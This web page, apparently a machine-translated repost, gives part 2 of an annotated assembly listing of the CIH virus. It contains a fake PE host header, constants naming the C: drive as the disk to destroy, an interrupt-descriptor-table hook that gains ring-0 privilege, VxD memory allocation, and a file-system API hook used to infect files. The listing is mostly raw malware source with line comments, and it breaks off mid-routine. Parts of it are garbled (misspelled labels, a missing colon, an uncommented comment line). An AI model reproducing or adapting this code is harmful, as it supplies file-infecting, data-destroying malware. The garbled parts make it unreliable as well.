Virus program source code example: anatomy of the CIH virus [2]

Source: Internet
Author: User
Virus program source code example: anatomy of the CIH virus [2]

Originalappexe SEGMENT
  
; PE format executable file header
Fileheader:
DB 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
DB 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
DB 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
DB 00eh, 01FH, 0bah, 00eh, 000h, 0b4h, 009h, 0CDH
DB 021h, 0b8h, 001h, 04ch, 0CDH, 021h, 054h, 068h
DB 069h, 073h, 020h, 070h, 072h, 06FH, 067h, 072h
DB 061h, 06DH, 020h, 063h, 061h, 06eh, 06eh, 06FH
DB 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
DB 020h, 069h, 06eh, 020h, 044h, 04FH, 053h, 020h
DB 06dh, 06FH, 064h, 065h, 02eh, 00DH, 00DH, 00ah
DB 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
DB 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 0e0h, 000h, 00FH, 001h
DB 00BH, 001h, 005h, 000h, 000h, 010h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
DB 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
DB 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
DB 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
DB 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
DB 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
DB 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
DB 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
DB 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
DB 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DD 00000000h, Virussize
  
Originalappexe ENDS
  
; Virus program started
TRUE = 1
FALSE = 0
DEBUG = FALSE
  
; Identify its version number as 1.4 version
Majorvirusversion = 1; major version number
Minorvirusversion = 4; minor version number
Virusversion = majorvirusversion*10h+minorvirusversion; synthetic version number
  
if debug;
Firstkillharddisknumber = 81h; Destroy D-Disk
Hookexceptionnumber = 05h; use interrupt # 5th
ELSE
Firstkillharddisknumber = 80h; destroy C drive
Hookxceptionnumber = 03h; use Interrupt # 3rd
ENDIF
  
Filenamebuffersize = 7fh
  
; virus snippet Start
Virusgame SEGMENT
  
Assume Cs:virusgame, Ds:virusgame, Ss:virusgame
Assume Es:virusgame, Fs:virusgame, Gs:virusgame
  
Myvirusstart:
Push EBP
  
; Modify system exception handling to avoid generating error messages
Lea EAX, [esp-04h*2]
XOR ebx, EBX
Xchg eax, FS:[EBX]
  
Call @0
  
@0
The pop ebx; Gets the program start offset, using this offset + relative offset to obtain an absolute address
Lea ECX, STOPTORUNVIRUSCODE-@0[EBX]
Push ECX
Push EAX
  
; Modify the interrupt description table to get the highest level of RING0 permission
Push EAX
Sidt [esp-02h]; Gets the base address of the interrupt description table to EBX
Pop ebx;
  
add ebx, hookexceptionnumber*08h+04h; calculates the base address to use for the cutoff to EBX
  
CLI; Turn off interrupts prior to modification
  
mov ebp, [ebx]; Get the base address for exception handling
mov BP, [ebx-04h]; Get the entrance
  
Lea ESI, MYEXCEPTIONHOOK-@1[ECX]
  
Push esi, ESI for virus interrupt routine address
  
mov [ebx-04h], si;
SHR ESI, 16; modifying exceptions
mov [ebx+02h], si; modify the interrupt base to point to the virus interrupt routine
  
Pop esi
  
; Generate an exception that enters the RING0 level
int hookexceptionnumber; Enter the RING0 level in an interrupted manner
Returnaddressofendexception = $
  
; Merge all virus codes
Push ESI
mov esi, eax; ESI points at the beginning of the virus
  
; Cycle for replication
Loopofmergeallviruscodesection:
mov ecx, [eax-04h]
  
Rep MOVSB; Copy the virus code to the allocated system memory first address
Sub eax, 08h
mov esi, [eax]
or ESI, ESI
JZ quitloopofmergeallviruscodesection; ZF = 1
  
JMP loopofmergeallviruscodesection; Copy the next paragraph
  
Quitloopofmergeallviruscodesection:
Pop esi
int Hookexceptionnumber
  
; Save exception handling
Readyrestorese:
STI; open interrupt
XOR ebx, EBX
JMP Restorese
  
; When an exception occurs, the description is currently under Windows NT, the virus will stop running and jump directly to the original program
Stoptorunviruscode:
@1 = Stoptorunviruscode
  
XOR ebx, EBX
mov eax, FS:[EBX]
mov esp, [EAX]
  
Restorese:
Pop dword ptr FS:[EBX]
Pop eax
  
; Jump to the original program, normal execution
Pop EBP
  
Push 00401000h; Push Original
Originaladdressofentrypoint = $-4; Put the starting address of the original program into the stack
RET; return to the beginning of the original program in the form of a subroutine return
; Virus Initialization Module
Myexceptionhook:
@2 = Myexceptionhook
  
JZ Installmyfilesystemapihook; If the virus code is copied,
; Go to the program that installs the system hooks
  
mov ecx, dr0; see if Dr0 is set (Dr0 is a virus-resident flag)
JECXZ allocatesystemmemorypage; Allocate system memory if not set
  
Add DWORD ptr [ESP], readyrestorese-returnaddressofendexception
  
; return to the original program
Exitring0init:
mov [ebx-04h], BP;
SHR EBP, 16; Restore Exception
mov [ebx+02h], BP; restore the original interrupt base
  
iretd; interrupt return
  
; Allocating the system memory that will be used
Allocatesystemmemorypage:
mov dr0, ebx; Sets the flag where the virus resides dr0
Push 00000000fh;
push ecx;
Push 0FFFFFFFFH;
push ecx; Call method ulong EXTERN _pageallocate (ULONG npages,
; ULONG PType, ULONG VM, ulong alignmask, ULONG Minphys,
; ULONG Maxphys, ULONG *physaddr,ulong flags);
push ecx;
push ecx;
Push 000000001h;
Push 000000002h;
int 20h; VXD invocation
_pageallocate = $
DD 00010053h; using EAX, ECX, edx, and flags registers
Add ESP, 08h*04h; restore stack pointer
  
Xchg EDI, eax; EDI points to the assigned system memory first address
Lea EAX, Myvirusstart-@2[esi]; eax point at the beginning of the virus.
  
iretd; exit interrupt
  
; Initialize file system hooks
Installmyfilesystemapihook:
Lea EAX, Filesystemapihook-@6[edi]; point to file System Hook program first address
  
push eax;
int 20h; VXD call Ifsmgr_installfilesystemapihook
Ifsmgr_installfilesystemapihook = $
DD 00400067h; using EAX, ECX, edx, and flags registers
  
mov dr0, eax; Save original file System Hook program first address to Dr0
Pop eax; eax equals file System hook program first address
  
Save the entry of the original Ifsmgr_installfilesystemapihook function call
mov ecx, Ifsmgr_installfilesystemapihook-@2[esi]
mov edx, [ecx]; edx for Ifsmgr_installfilesystemapihook entrance
mov Oldinstallfilesystemapihook-@3[eax], edx
  
; Modify Ifsmgr_installfilesystemapihook Entrance
Lea EAX, Installfilesystemapihook-@3[eax]
mov [ECX], eax; Sets the address of the new Ifsmgr_installfilesystemapihook function call
; Make a point to Installfilesystemapihook
CLI; off interrupt
